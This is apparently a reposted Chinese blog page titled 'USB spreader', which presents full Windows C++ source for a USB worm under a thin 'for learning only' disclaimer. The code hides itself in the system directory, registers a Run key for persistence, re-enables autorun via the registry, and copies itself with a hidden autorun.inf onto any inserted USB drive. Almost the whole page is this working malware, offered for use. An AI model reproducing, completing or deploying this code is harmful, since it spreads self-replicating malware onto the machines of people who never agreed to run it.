U盘传播者(转)

声明:代码仅做学习交流,使用后果自负
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//计时器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程
//获取盘符
TCHAR FirstDriveFromMask (ULONG unitmask);
//病毒从U盘启动时用到的函数
BOOL FileExist(TCHAR *path);//测试一个文件是否存在
BOOL GetSelfPath(TCHAR *path);//Get the virus's path
//BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path);//得到系统路径
BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置
BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性
BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动
//从C盘启动时用到函数
BOOL CopyToUAndSet();//复制自己到U盘
BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件
BOOL FindSelf();//测试自己是否在已经执行了
//global variable
TCHAR szExePath[MAX_PATH];//the virus's path
TCHAR U[2];//保存U盘的盘符
TCHAR szSysPath[MAX_PATH];//system path
//constant
const TCHAR *szExeName="bbbbb.exe";
const TCHAR *szSysName="aaaaa.exe";
const TCHAR *szAutoRunFile="AutoRun.inf";
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
                    PSTR szCmdLine, int iCmdShow)
{
    static TCHAR szAppName[]=TEXT ("UUUUUU");
    HWND               hwnd;
    MSG                msg;
    WNDCLASS           wndclass;
   
    wndclass.style            =0;
    wndclass.lpfnWndProc      =WndProc;
    wndclass.cbClsExtra       =0;
    wndclass.cbWndExtra       =0;
    wndclass.hInstance        =hInstance;
    wndclass.hIcon            =0;
    wndclass.hCursor          =0;
    wndclass.hbrBackground    =0;
    wndclass.lpszMenuName     =NULL;
    wndclass.lpszClassName    =szAppName;
    if (!RegisterClass (&wndclass))
    {
        MessageBox (NULL,TEXT("Program requires Windows NT!"),
            szAppName, MB_ICONERROR);
        return 0;
    }
    hwnd = CreateWindow (szAppName, NULL,
        WS_DISABLED,
        0, 0,
        0, 0,
        NULL, NULL, hInstance, NULL);
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage (&msg);
        DispatchMessage (&msg);
    }
    return msg.wParam;
}
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
    PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
    switch(wParam)
    {
    case DBT_DEVICEARRIVAL: //插入
        if (lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME)
        {
            PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
            U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符
            //MessageBox(0,U,"Notice!",MB_OK);
            CopyToUAndSet();//拷到u盘
        }
        break;
    case DBT_DEVICEREMOVECOMPLETE: //设备删除
        break;
    }
    return LRESULT();
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
    switch(message)
    {
    case WM_CREATE:           //处理一些要下面要用到的全局变量
        U[1]=':';
        GetSysPath(szSysPath);//得到系统路径
        SetTimer(hwnd,TIMER,5000,0);//启动计时器
        GetSelfPath(szExePath);//得到自身的路径
        return 0;
    case WM_TIMER:             //timer message
        if(szExePath[0]==szSysPath[0])  //如果是系统盘启动的
            SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息
        else
        {
            CopyToSysAndSet(hwnd);//拷到系统盘并自启动
        }
        return 0;
    case WM_DEVICECHANGE:
        OnDeviceChange(hwnd,wParam,lParam);
        return 0;
    case WM_DESTROY:
        KillTimer(hwnd,TIMER);
        PostQuitMessage(0);
        return 0;
    }
    return DefWindowProc(hwnd, message, wParam, lParam);
}
TCHAR FirstDriveFromMask(ULONG unitmask)
{
    char i;
    for (i = 0; i < 26; ++i)
    {
        if (unitmask & 0x1)//看该驱动器的状态是否发生了变化
            break;
        unitmask = unitmask >> 1;
    }
    return (i + 'A');
}
BOOL GetSelfPath(TCHAR *path)
{
    if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录
    {
        return TRUE;
    }
    else
        return FALSE;
}
BOOL GetSysPath(TCHAR *path)
{
    return GetSystemDirectory(path,MAX_PATH);//得到系统路径
}
BOOL CopyToSysAndSet(HWND hwnd)
{
    TCHAR szPath[MAX_PATH];
    lstrcpy(szPath,szSysPath);
    lstrcat(szPath,"//");
    lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录
    if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件
    {
        CopyFile(szExePath,szPath,FALSE);
        RegAutoRun(szPath);
        return SetFileAttrib(szPath);
    }
    else
    {
        if(!FindSelf())//检测自己有没有运行
        {   
            //MessageBox(0,szExePath,szPath,MB_OK);
            WinExec(szPath,SW_HIDE);//没有就执行
            SendMessage(hwnd,WM_CLOSE,0,0);//结束自己
        }
    }
    return FALSE;
}
BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在
{
    int result;
    result=PathFileExists(path);
    if(result==1)
        return TRUE;
    else
        return FALSE;
}
BOOL SetFileAttrib(TCHAR *path)
{
    return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动
{
    HKEY hkey;
    DWORD v=0;
    RegOpenKey(HKEY_CURRENT_USER,"Software//Microsoft//Windows//CurrentVersion//Policies//Explorer",&hkey);
    RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD));
    if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE//MICROSOFT//Windows//CurrentVersion//Run",
        &hkey)==ERROR_SUCCESS)
    {
        RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));
        RegCloseKey(hkey);
        return TRUE;
    }
    else
        return FALSE;
}
BOOL CopyToUAndSet()
{
    TCHAR szPath[MAX_PATH];
    lstrcpy(szPath,U);
    lstrcat(szPath,"//");
    lstrcat(szPath,szExeName);//得到指向U盘的完整目录
   
    TCHAR szAutoFile[MAX_PATH];
    lstrcpy(szAutoFile,U);
    lstrcat(szAutoFile,"//");
    lstrcat(szAutoFile,szAutoRunFile);
   
    if(!FileExist(szAutoFile))
    {
        CreateAutoRunFile(szAutoFile);
        SetFileAttrib(szAutoFile);
    }
    if(!FileExist(szPath))
    {
        CopyFile(szExePath,szPath,FALSE);
        return SetFileAttrib(szPath);
    }
    return FALSE;
}
BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件
{
    ofstream fout;
    fout.open(path);
    if(fout)
    {
        fout<<"[AutoRun]"<<endl;
        fout<<"open="<<szExeName<<" e"<<endl;
        fout<<"shellexecute="<<szExeName<<" e"<<endl;
        fout<<"shell//Auto//command="<<szExeName<<" e"<<endl;
        fout<<"shell=Auto"<<endl;
        fout.close();
        return TRUE;
    }
    return FALSE;
}
BOOL FindSelf(){
    PROCESSENTRY32 pe;
    HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    pe.dwSize=sizeof(PROCESSENTRY32);
    if(Process32First(hShot,&pe)){
        do{
            if(lstrcmp(pe.szExeFile,szSysName)==0)
            {
                CloseHandle(hShot);
                return TRUE;
            }
        }while(Process32Next(hShot,&pe));
    }
    CloseHandle(hShot);
    return FALSE;
}

你可能感兴趣的:(U盘传播者(转))